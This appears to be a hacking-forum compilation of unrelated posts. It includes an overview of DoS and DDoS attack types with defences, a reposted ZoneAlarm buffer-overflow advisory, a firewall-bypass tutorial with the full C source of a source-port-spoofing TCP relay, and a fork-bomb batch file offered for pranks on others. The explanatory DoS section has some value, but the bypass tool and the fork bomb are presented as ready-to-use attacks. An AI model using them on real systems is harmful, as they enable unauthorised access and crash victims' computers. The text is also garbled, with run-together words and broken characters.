Types of Attacks on Web Servers

Newspapers Internet magazines came with cover stories when Denial of service (DoS) attacks assaulted a number of large and very successful companies' websites last year. Those who claim to provide security tools were under attack. If Yahoo, Amazon, CNN and Microsoft feel victim to DoS attacks, can any site-owner feel safe?

In this article we'll try to make site owners understand the "In and Outs" of DoS andDDoS attack methods, vulnerabilities, and potential solutions to these problems. Webmasters are usually seen searching for solutions to new security threats and ways of patching-up before it is too late.

DoS:

In a Denial of Service (DoS) attack, the attacker sends a stream of requests to a service on the server machine in the hope of exhausting all resources like "memory" or consuming all processor capacity.

DoS Attacks Involve:

* Jamming Networks
* Flooding Service Ports
* Misconfiguring Routers
* Flooding Mail Servers

DDoS:

In Distributed DoS (DDoS) attack, a hacker installs an agent or daemon on numerous hosts. The hacker sends a command to the master, which resides in any of the many hosts. The master communicates with the agents residing in other servers to commence the attack. DDoS are harder to combat because blocking a single IP address or network will not stop them. The traffic can derive from hundred or even thousands of individual systems and sometimes the users are not even aware that their computers are part of the attack.

DDoS Attacks Involve:

* FTP Bounce Attacks
* Port Scanning Attack
* Ping Flooding Attack
* Smurf Attack
* SYN Flooding Attack
* IP Fragmentation/Overlapping Fragment Attack
* IP Sequence Prediction Attack
* DNS Cache Poisoning
* SNMP Attack
* Send Mail Attack

Some of the more popular attack methods are described below.
_________________________________________________________________________________

FTP Bounce Attack

FTP (File Transfer Protocol) is used to transfer documents and data anonymously from local machine to the server and vice versa. All administrators of FTP servers should understand how this attack works. The FTP bounce attack is used to slip past application-based firewalls.

In a bounce attack, the hacker uploads a file to the FTP server and then requests this file be sent to an internal server. The file can contain malicious software or a simple script that occupies the internal server and uses up all the memory and CPU resources.

To avoid these attacks, the FTP daemon on the Web servers should be updated regularly. The site FTP should me monitored regularly to check whether any unknown file is transferred to the Web server. Firewalls also help by filtering content and commands. Some firewalls block certain file extensions, a technique that can help block the upload of malicious software.
_________________________________________________________________________________

Port Scanning Attack

A port scan is when someone is using software tosystematically scan the entry points on other person?s machine. There arelegitimate uses for this software in managing a network.

Mosthackers enter another?s computer to leave unidentifiable harassing messages,capture passwords or change the set-up configuration. The defense for this isthrough, consistent network monitoring. There are free tools that monitor forport scans and related activity.
_________________________________________________________________________________

Ping Flooding Attack

Pinging involves one computer sending a signal to anothercomputer expecting a response back. Responsible use of pinging providesinformation on the availability of a particular service. Ping Flooding is theextreme of sending thousands or millions of pings per second. Ping Flooding cancripple a system or even shut down an entire site.

APing Flooding Attack floods the victim?s network or machine with IP Pingpackets. At least 18 operating systems are vulnerable to this attack, but themajority can be patched. There are also numerous routers and printers that arevulnerable. Patches cannot currently be applied throughout a global networkeasily.
_________________________________________________________________________________
Smurf Attack

A Smurf Attack is modification of the "ping attack"and instead of sending pings directly to the attacked system, they are sent to abroadcast address with the victim?s return address. A range of IP addressesfrom the intermediate system will send pings to the victim, bombarding thevictim machine or system with hundreds or thousands of pings.

One solution is to prevent the Web server from being usedas a broadcast. Routers must be configured to deny IP-Directed broadcasts fromother networks into the network. Another helpful measure is to configure therouter to block IP spoofing from the network to be saved. Routers configured assuch will block any packets that donor originate in the Network.To be effective this must be done to all routers on the network.
_________________________________________________________________________________

SYN Flooding Attack

This attack exploits vulnerability in the TCP/IPcommunications protocol. This attack keeps the victim machine responding back toa non-existent system. The victim is sent packets and asked to response to asystem or machine with an incorrect IP address. As it responds, it is floodedwith the requests. The requests wait for a response until the packets begin totime out and are dropped. During the waiting period, the victim system isconsumed by the request and cannot respond to legitimate requests.

When a normal TCP connection starts, a destination hostreceives a SYN (synchronize/start) packet from a source host and sends back aSYN ACK (synchronize acknowledge) response. The destination host must the hearan acknowledgement, or ACK packet, of the SYN ACK before the connection isestablished. This is referred as the "TCP three-way handshake?.

Decreasingthe time-out waiting period for the three way handshake can help to reduce therisk of SYN flooding attacks, as will increasing the size of the connectionqueue (the SYN ACK queue). Applying service packs to upgrade older operatingsystems is also a good countermeasure. More recent operating systems areresistant to these attacks.
____________________________________________________________________    
IP Fragmentation/Overlapping Fragment Attack

To facilitate IP transmission over comparatively congestednetworks. IP packets can be reduced in size or broken into smaller packets. Bymaking the packets very small, routers and intrusion detection systems cannotidentify the packets contents and will let them pass through without anyexamination. When a packet is reassembled at the other end, it overflows thebuffer. The machine will hang, reboot or may exhibit no effect at all.

Inan Overlapping Fragment Attack, the reassembled packet starts in the middle ofanother packet. As the operating system receives these invalid packets, itallocates memory to hold them. This eventually uses all the memory resources andcauses the machine to reboot or hang. _______________________________________________________________________ 
IP Sequence Prediction Attack

Usingthe SYN Flood method, a hacker can establish connection with a victim machineand obtain the IP packet sequence number in an IP Sequence Prediction Attack.With this number, the hacker can control the victim machine and fool it intobelieving it?s communicating with another network machines. The victim machinewill provide requested services. Most operating systems now randomize theirsequence numbers to reduce the possibility of prediction.
_______________________________________________________________________   
DNS Cache Poisoning

DNS provides distributed host information used for mappingdomain names and IP addresses. To improve productivity, the DNS server cachesthe most recent data for quick retrieval. This cache can be attacked and theinformation spoofed to redirect a network connection or block access to the Web sites),a devious tactic called DNS cache poisoning.

 The best defense against problems such as DNS cachepoisoning is to run the latest version of the DNS software for the operatingsystem in use. New versions track pending and serialize them to help preventspoofing.
_______________________________________________________________________    
SNMP Attack
 
Most network devices support SNMP because it is active bydefault. An SNMP Attack can result in the network being mapped, and traffic canbe monitored and redirected.

The best defense against this attack is upgrading toSNMP3, which encrypts passwords and messages. SinceSNMP resides on almost all network devices, routers, hubs, switches, Servers andprinters, the task of upgrading is huge. Some vendors now offer an SNMP Managementtool that includes upgrade distribution for global networks.
_______________________________________________________________________  
UDP Flood Attack

AUDP Flood Attacks links two unsuspecting systems. By Spoofing, the UDP floodhooks up one system?s UDP service (which for testing purposes generates aseries of characters for each packet it receives) with another system?s UDPecho service (which echoes any character it receives in an attempt to testnetwork programs). As a result a non-stop flood of useless data passes betweentwo systems.
_______________________________________________________________________   
Send Mail Attack

In this attack, hundreds of thousands ofmessages are sent in a short period of time; a normal load might only be 100 or1000 messages per hour. Attacks against Send Mail might not make the front page,but downtime on major websites will.

For companies whose reputation dependson the reliability and accuracy of their Web-Based transactions, a DoS attackcan be a major embarrassment and a serious threat to business.
_______________________________________________________________________    
Conclusion

Frequent denial-of-service attacks and achange in strategy by "Black-Hat Hackers" are prompting enterprises todemand technology that proactively blocks malicious traffic.

Tools and services that reflect approaches to combat such DoS attacks have been introduced with time. These arenormally upgrades to what was produced before. No solution is ever said to be anultimate solution to defend DoS attacks. Despite the new technology coming everyday, the attacks are likely to continue. 

ZoneAlarm Flaw Opens Firewalls To E-mail Attack

got this from the net .........nice though

Zone Labs has alerted users that several versions of its personal firewall products are vulnerable to a buffer overflow attack conducted via e-mail that could leave supposedly-protected systems open to malicious code assaults, the company said.
The affected editions include the 4.0 versions of ZoneAlarm, ZoneAlarm Plus, and ZoneAlarm Pro; ZoneAlarm Pro 4.5; and Zone Labs Integrity Client 4.0 and 4.5.

"If successfully exploited, a skilled attacker could cause the firewall to stop processing traffic, execute arbitrary code, or elevate malicious code's privileges," ZoneAlarm said Wednesday in the alert posted on its Web site.

The vulnerability, which was first reported by eEye Digital Security, is caused by an unchecked buffer in Simple Mail Transfer Protocol (SMTP) processing, which could in turn lead to a buffer overflow, said ZoneAlarm. To exploit the vulnerability remotely, the target system must be operating as an SMTP server.

"Zone Labs does not recommend using our client security products to protect servers," the company said. Zone Labs also sells a server-specific firewall under its Integrity line.

ZoneAlarm users were urged to update their software to version 4.5.538.001, while Integrity Client 4.0 and 4.5 users should upgrade to versions 4.0.146.046 and 4.5.085, respectively. More details on the vulnerability and upgrade instructions can be found on the Zone Labs Web site. 

Exploiting buggy/weak Firewall's

In this tutorial we'll be looking at a new way(at least for me) to bypass weak firewalls...

A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set of rules and is frequently used to protect networks from unauthorized access while permitting legitimate communications to pass. (Wikipedia)

In basic language.. Firewall contains a list of some basic rules/signatures like packet filters etc etc.. It basically checks the network traffic for content that can be malicious or can be potentially harmful for the machine..

Firewalls are implemented for securing parts of the network from Hackers or any malicious users but , However if a Firewall is poorly written/implemented it will make the exploitation easier rather.. for demonstrating how these can be exploited I'll take up a Scenario..

Scenario

Most of the buggy firewalls out there carry out packet filtering by relying on the packet data..(Which indeed not to be trusted upon)..

Lets take an example that there is a System with one of these buggy firewalls and is protecting SSH , SMB etc.. But still other services like ftp and http are not filtered as they are readily used by their clients..

Now our job is to carry out requests with 22 as port number (FTP) and Destination Port No set to the service we want to access(SMB Port 445)..This would bypass the firewall leading to easy exploitation..

Tool that can be used (Kev proxy) :-
      Code:

/*
 * kev proxy
 * it's not big, but then, it's not that clever either.
 *
 * compile with cc -o kp kp.c -lpthread
 * tested on Red Hat 8, should work on most Linux
 *
 * kp listen_port target_ip target_port <source_port> <v>
 *
 * kp will listen on the listen_port and relay bi-directional data
 * between this port and the target_port on the target_ip.
 * The optional source_port is to set the source port on the outbound
 * connection to the target_ip.  Useful for getting around ACLs in
 * routers and firewalls.
 * 'v' indicates verbose mode for extra info.
 *
 * Note: it does not operate as a 'real' HTTP proxy, although it can
 * proxy HTTP as well as any other TCP protocol; just don't let your
 * browser know it's talking to a proxy ;) (unless, of course, you're
 * proxying for an HTTP proxy!)
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>


int listen_port, target_port, source_port, verbose;
char target_ip[1024];

void * kp(void *);

void die(int sig)
{
    pthread_exit(NULL);
}

void usage()
{
    printf("kp listen_port target_ip target_port <source_port> <v>\n");
}

int getMax(int q1, int q2)
{
    if (q1 > q2) return q1; else return q2;
}

int main(int argc, char **argv)
{
    int fd, fd1;
    const int on = 1;
    struct sockaddr_in fd_sock, fd_sock1;
    socklen_t listenlen;
    pthread_t ptConnection;

    (void) signal (SIGINT, die);

    verbose = 0;
    source_port = 0;

    if ((argc < 4) || (argc > 6))
    {
        usage();
        exit(1);
    }

    printf("kevproxy\n");

    listen_port = atoi(argv[1]);
    target_port = atoi(argv[3]);
    if (argc > 4) {
        if (strcmp(argv[4], "v") == 0)
        {
            if (argc > 5)
            {
                usage();
                exit(1);
            }
            verbose = 1;
            source_port = 0;
        } else {
            source_port = atoi(argv[4]);
            if (argc > 5)
            {
                if (strcmp(argv[5], "v") == 0)
                {
                    verbose = 1;
                } else {
                    usage();
                    exit(1);
                }
            }
        }
    } else {
        source_port = 0;
    }

    strcpy(target_ip, argv[2]);

    printf("Listening on %d, sending to %s:%d", listen_port, target_ip, target_port);
    if (source_port != 0) {
        printf(", source port %d\n", source_port);
    } else {
        printf("\n");
    }

    // fd_sock is listener
    fd_sock.sin_family = AF_INET;
    fd_sock.sin_port = htons(listen_port);
    fd_sock.sin_addr.s_addr = INADDR_ANY;

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd <0) {
        perror("fd: opening stream socket");
        return -1;
    }
    if (verbose) printf("socket fd made\n");

    if (setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) != 0)
    {
        perror("fd: setsockopt failed");
    }
    if (verbose) printf("socket fd option set\n");

    if (bind(fd, (struct sockaddr *)&fd_sock, sizeof fd_sock) <0)
    {
        return 0;
    }
    if (verbose) printf("Bound fd!\n");

    if (listen(fd, 1024) < 0)
    {
        return 0;
    }
    if (verbose) printf("fd: listening!\n");

    for (;;)
    {
        // fd_sock1 is the accepted conx
        fd_sock1.sin_family = AF_INET;
        fd_sock1.sin_port = INADDR_ANY;
        fd_sock1.sin_addr.s_addr = INADDR_ANY;
    
        listenlen = sizeof fd_sock1;
        fd1 = accept(fd, (struct sockaddr *)&fd_sock1, &listenlen);

        if (fd1 < 0)
        {
            return 0;
        }
        if (verbose) printf("fd1: accepted!\n");

        if (pthread_create (&ptConnection, NULL, kp, &fd1) != 0)
        {
            perror("could not create thread");
            return 0;
        }
        if (verbose) printf("thread created\n");

        if ( (pthread_detach(ptConnection)) != 0)
        {
            perror("could not detach thread");
        }
        if (verbose) printf("thread detached\n");
    }
}

void closesocks(int sock1, int sock2)
{
    while (close(sock1) != 0);
    if (verbose) printf("sock1 closed\n");
    while (close(sock2) != 0);
    if (verbose) printf("sock2 closed\n");
}

void * kp(void *fd_in)
{
    fd_set socks;
    int selectret;
    int maxsock;
    int accfd, fd2;
    int num;
    char buff[65100];
    struct sockaddr_in fd_sock2, fd_sock3;

    accfd = * (int *) fd_in;

    if (verbose) printf("accfd = %d\n", accfd);

        // fd_sock2 is local port of outbound conx
    fd_sock2.sin_family = AF_INET;
    fd_sock2.sin_port = htons(source_port);
    fd_sock2.sin_addr.s_addr = INADDR_ANY;

    // fd_sock3 is outbound conx
    fd_sock3.sin_addr.s_addr=inet_addr(target_ip);
    fd_sock3.sin_port = htons(target_port);
    fd_sock3.sin_family = AF_INET;

    fd2 = socket(AF_INET, SOCK_STREAM, 0);
    if (fd2 <0) {
        perror("fd2: opening stream socket");
        return NULL;
    }
    if (verbose) printf("socket fd2 made\n");

    if (source_port != 0) {
        if (bind(fd2, (struct sockaddr *)&fd_sock2, sizeof fd_sock2) < 0)
        {
            perror("fd2: bind failed");;
        } else {
            if (verbose) printf("Bound fd2!\n");
        }
    }

    if (connect(fd2, (struct sockaddr *)&fd_sock3, sizeof fd_sock3) < 0)
    {
        perror("fd2: connect");
        return  NULL;
    }
    if (verbose) printf("Connected fd2!\n");

    maxsock = getMax(accfd, fd2);

    while (1) {
        //printf(".");
        FD_SET (accfd, &socks);
        FD_SET (fd2, &socks);

        selectret = select (maxsock+1, &socks, NULL, NULL, NULL);
        if (selectret == -1)
        {
            perror("select failed");
            break;
        }

        if (FD_ISSET (accfd, &socks))
        {
            num = read(accfd, buff, 65000);
            if (num <=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(fd2, buff, num) != num)
            {
                perror("fd2 write error");
            }
            if (verbose) printf("accfd -> fd2, %d bytes\n", num);
        }

        if (FD_ISSET (fd2, &socks))
        {
            num = read(fd2, buff, 65100);
            if (num <=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(accfd, buff, num) != num)
            {
                perror("accfd write error");
            }
            if (verbose) printf("fd2 -> accfd, %d bytes\n", num);
        }

    }
    if (verbose) printf("thread exiting\n");
    pthread_exit(NULL);
    return NULL;
}

Thanks for viewing and I hope the viewers like it!! 

How to make a Fork Bomb (rabbit virus) ?

Introduction

Hey guys, haven't posted on here for a while, been honing my skills  . And I 've got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don't bomb yourself.    

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing...I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go...

Blocks of code should be set as style "Formatted" like this.
Code: .bat

:s

START %0

GOTO :s

References

Have fun guys